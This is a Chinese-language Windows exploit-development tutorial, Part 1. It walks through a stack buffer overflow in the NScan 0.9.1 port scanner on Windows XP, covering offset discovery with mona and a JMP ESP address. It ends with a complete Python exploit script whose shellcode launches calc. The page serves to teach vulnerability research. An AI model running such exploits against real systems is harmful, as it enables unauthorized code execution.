<!DOCTYPE html>
<html>
<head>
<title>part1</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
/* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
/* Author: Nicolas Hery - http://nicolashery.com */
/* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
/* Source: https://github.com/nicolahery/markdownpad-github */

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: Helvetica, arial, freesans, clean, sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
</head>
<body>
<h1>Windows漏洞利用开发教程 Part 1</h1>
<p><image src="image/p1.jpg" /></p>
<h2>0x01 前言</h2>
<p>漏洞-信息安全界最常见的词汇，在百度百科是这样描述的。</p>
<p>漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。</p>
<p>本文主要介绍的是Windows软件漏洞的利用开发教程。</p>
<p>我花了大量的时间来研究了计算机安全领域Windows漏洞利用开发，希望能和大家分享一下，能帮助到对这方面感兴趣的朋友，如有不足，还请见谅。</p>
<h2>0x02 准备阶段</h2>
<p>由浅入深，从简单的入手然后慢慢的学习更复杂的系统攻击，我们先来学习一下Windows XP（32位）简单的缓冲区溢出攻击。所以我们需要准备以下工具：</p>
<p>1、Windows XP SP3 32-bit系统iso镜像</p>
<p>2、Immunity Debugger-漏洞分析专用调试器</p>
<p>3、代码文本编辑器（个人喜好，我用的是notepad++）</p>
<p>准备好上面的三个后，我们开始搭建虚拟机环境，这个我就简单的介绍一下。</p>
<p>这里我使用的是VMware，我们打开软件后新建一个虚拟机，然后就是安装系统很简单。</p>
<p><image src="image/p2.png" /></p>
<h2>0x03 漏洞分析</h2>
<p>现在你肯定想动手试一试了，我们的目标是Windows端口扫描仪NScan版本0.9.1</p>
<p>漏洞地址：</p>
<p>https://www.exploit-db.com/exploits/40297/</p>
<p>软件下载地址：</p>
<p>https://www.exploit-db.com/apps/b235ebf93610e43c8b2246ea39d71ba7-nscan091.exe</p>
<p>软件下载安装</p>
<p><image src="image/p3.png" /></p>
<p>阅读文档我们知道漏洞出自dig.exe的Target字段，这是一个堆栈缓冲区溢出错误。</p>
<h3>验证</h3>
<p>现在我们来验证一下错误的触发，将1100个A字符串输入到Target字段中并点击TCP lookup，观察它是否崩溃。</p>
<p>获取1100个a字符</p>
<pre><code>python:

print 'a'*1100
</code></pre>

<p><image src="image/p4.png" /></p>
<p>点击后我们发现确实程序崩溃了</p>
<p><image src="image/p5.png" /></p>
<p>由用户输入导致的程序崩溃是一个漏洞利用开发的开始。</p>
<h3>分析</h3>
<p>我们知道该程序因为我们的输入奔溃啦，现在来分析一下它为什么会崩溃。</p>
<p>第一步：打开Immunity Debugger</p>
<p><image src="image/p6.png" /></p>
<p>点击File-Open打开dig.exe</p>
<p><image src="image/p7.png" /></p>
<p>点击Run program或者按F9让程序运行。</p>
<p><image src="image/p8.png" /></p>
<p>运行完我们继续触发崩溃。</p>
<p><image src="image/p9.png" /></p>
<p>崩溃后我们来看寄存器。</p>
<p><image src="image/p10.png" /></p>
<p>看EIP寄存器0x61616161,这是哪里来的？其实它是我们输入的，字符串a的十六进制ASCII就是61。程序将字母a存入文本字段缓冲区直到溢出并替换堆栈上返回地址的内容。因此我们称为堆栈缓冲区溢出漏洞。这意味着我们可以控制EIP寄存器的值从而控制目标程序的执行流程。</p>
<h2>0x04 漏洞利用开发</h2>
<p>现在我们想要利用这个控制并执行我们自己的控制代码。</p>
<h3>寻找EIP offset</h3>
<p>首先我们需要找到EIP offset，也就是正好覆盖到EIP的偏移量以便我们精准的覆盖EIP寄存器。所以我们要知道哪4个	a是放入到了EIP寄存器中，这就很复杂了,当然方法是有的，这里我们使用Immunity Debugger的插件mona，这样我们就避免了平常复杂的寻找方法。</p>
<p>安装mona：</p>
<p>https://github.com/corelan/mona</p>
<p>将mona.py放在Immunity Debugger安装目录PyCommands下就行了。</p>
<p>第一步：设置mona文本日志所在的文件夹</p>
<pre><code>!mona config -set workingfolder c:\logs\%p
</code></pre>

<p><image src="image/p11.png" /></p>
<p>第二步：生成1100个测试字符</p>
<pre><code>!mona pattern_create 1100
</code></pre>

<p>运行完在C:\logs\dig\pattern.txt中找到。</p>
<p><image src="image/p12.png" /></p>
<p>第三步：复制测试字符串，将测试字符串输入到Target字段中并点击TCP lookup（步骤和前面相同）</p>
<p><image src="image/p13.png" /></p>
<p>可以发现EIP地址现在是0x68423268</p>
<p>第四步：确定偏移量</p>
<pre><code>!mona pattern_offset 0x68423268
</code></pre>

<p><image src="image/p14.png" /></p>
<p>我们找到了偏移量997</p>
<h3>测试</h3>
<p>我们找到了，但是这对不对呢，我们来测试一下，我们使用Python脚本来生成一个Payload。</p>
<pre><code>bfsize = 1100
a = &quot;\x41&quot;*997 
eip = &quot;\x42&quot;*4
exploit = a + eip
c = &quot;\x43&quot;*(bfsize-len(exploit))
buffer = exploit + c
print buffer
print &quot;Buffer size: &quot; + str(len(buffer)) + &quot;\n&quot;
</code></pre>

<p>很简单的一个脚本生成一个1100字符的测试payload</p>
<p><image src="image/p15.png" /></p>
<p>将测试字符串输入到Target字段中并点击TCP lookup（步骤和前面相同）</p>
<p><image src="image/p16.png" /></p>
<p>不出意外，EIP被精确的覆盖。</p>
<h3>寻找合适的地址覆盖EIP</h3>
<p>现在，我们已经证实我们可以将EIP覆盖为任意地址，那么到底覆盖为哪个地址呢？对于本教程，我们将选择ESP寄存器作为我们代码执行目标。</p>
<p>CTRL+F2重新运行</p>
<p><image src="image/p17.png" /></p>
<p>点击Run program或者按F9让程序运行然后输入指令</p>
<pre><code>!mona jmp -r esp
</code></pre>

<p><image src="image/p18.png" /></p>
<p>稍作等待，我们进入mona日志目录(前面设置的目录)，可以发现jmp.txt</p>
<p><image src="image/p19.png" /></p>
<p>我们通常选择kernel32.dll模块。</p>
<h3>开发框架</h3>
<p>准备的差不多了，我们现在来完成生成Payload的Python框架吧。</p>
<pre><code># -*- coding: UTF-8 -*- 
import struct

junk = &quot;A&quot; * 997    #偏移
eip = struct.pack(&quot;&lt;L&quot;,0x7c8369f0)  #JMP ESP kernel32
nops = &quot;\x90&quot; * 10  #10字节NOP
fill = &quot;\x43&quot; * 10

#shellcode 要执行的代码


#payload
payload = junk + eip + nops + shellcode+fill

#将payload写入到文件payload.txt

fp = open(&quot;payload.txt&quot;,&quot;w&quot;)
fp.write(payload)
fp.close()
print &quot;[+]Exploit successfully!&quot;
</code></pre>

<h3>Shellcode</h3>
<p>完事具备，只欠东风。没错，我们还缺少shellcode，这个很关键，没有这个只是空谈利用。</p>
<pre><code>shellcode = &quot;\x31\xC9&quot;                  # xor ecx,ecx
shellcode += &quot;\x51&quot;                     # push ecx
shellcode += &quot;\x68\x63\x61\x6C\x63&quot;     # push 0x636c6163
shellcode += &quot;\x54&quot;                     # push dword ptr esp
shellcode += &quot;\xB8\xAD\x23\x86\x7C&quot;     # mov eax,0x7c8623AD
shellcode += &quot;\xFF\xD0&quot;                 # call eax
</code></pre>

<p>前面我们已经载入了kernel32.dll模块，接下来调用一下WinExec函数打开calc(计算器)就好了。</p>
<p>初学者有可能看不到，其实就是在调用函数，将函数的参数从右到左压入栈中然后调用。</p>
<p>WinExec函数地址在各版本系统可能不同，我们使用PE软件可以获取到，这里我使用的是StudyPE+ x86。</p>
<p>文件-打开文件（加载kernel32.dll模块）</p>
<p><image src="image/p20.png" /></p>
<p>记住映像基址</p>
<p><image src="image/p21.png" /></p>
<p>在导出选项卡找到函数并记住偏移地址</p>
<p>偏移地址+映像基址=函数在虚拟内存中的地址</p>
<h3>测试</h3>
<pre><code>完整代码如下：

# -*- coding: UTF-8 -*- 
import struct

junk = &quot;A&quot; * 997    #偏移
eip = struct.pack(&quot;&lt;L&quot;,0x7c8369f0)  #JMP ESP kernel32
nops = &quot;\x90&quot; * 10  #10字节NOP
fill = &quot;\x43&quot; * 10

#shellcode 要执行的代码

shellcode = &quot;\x31\xC9&quot;                                  # xor ecx,ecx
shellcode += &quot;\x51&quot;                                     # push ecx
shellcode += &quot;\x68\x63\x61\x6C\x63&quot;     # push 0x636c6163
shellcode += &quot;\x54&quot;                                     # push dword ptr esp
shellcode += &quot;\xB8\xAD\x23\x86\x7C&quot;     # mov eax,0x7c8623AD
shellcode += &quot;\xFF\xD0&quot;                             # call eax

#payload
payload = junk + eip + nops + shellcode+fill

#将payload写入到文件payload.txt

fp = open(&quot;payload.txt&quot;,&quot;w&quot;)
fp.write(payload)
fp.close()
print &quot;[+]Exploit successfully!&quot;
</code></pre>

<p>运行一下</p>
<pre><code>E:\hacktools\python&gt;python payload.py
[+]Exploit successfully!
</code></pre>

<p>我们复制生成的payload，将payload字符串输入到Target字段中并点击TCP lookup（步骤和前面相同）</p>
<p><image src="image/p22.png" /></p>
<p>很好，我们终于一步步完成了，成功弹出了一个计算器。</p>
<h2>0x05 总结</h2>
<p>一步步遇到的坑也不少，希望能帮助到需要的朋友，下面来总结一下本文一些知识点吧。在文中我们一步步证码了漏洞的存在，多次使用了Immunity Debugger的插件mona很大减少了复杂的操作步骤，查找函数地址，简单的构建了一个弹计算器的shellcode。本人水平有限，如有不足，还请各位兄弟指出。</p>

</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
